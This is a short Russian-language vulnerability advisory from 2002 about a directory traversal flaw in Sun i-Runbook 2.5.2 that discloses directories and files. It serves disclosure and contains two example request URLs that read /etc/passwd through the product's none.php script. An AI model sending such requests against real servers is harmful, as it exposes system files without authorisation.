Раскрытие содержание директории и файлов в Sun i-Runbook

Дата публикации:15.07.2002
Всего просмотров:775
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Sun i-Runbook система технического и административного обслуживания продуктов Sun со встроенным Web интерфейсом. Специально обработанный запрос с абсолютным путем к каталогу или файлу приведет к раскрытию такого каталога или файла. Пример:
http://<Serverip:port>/content/base/build/explorer/none.php?..:..:..:..:..:. .:..:etc:passwd: 

http://<Serverip:port>/content/base/build/explorer/none.php?/etc/passwd
уязвимость обнаружена в Sun i-Runbook 2.5.2
Ссылки: Portcullis Security Advisory - Directory Traversal Vulnerability in SunPS iRunbook 2.5.2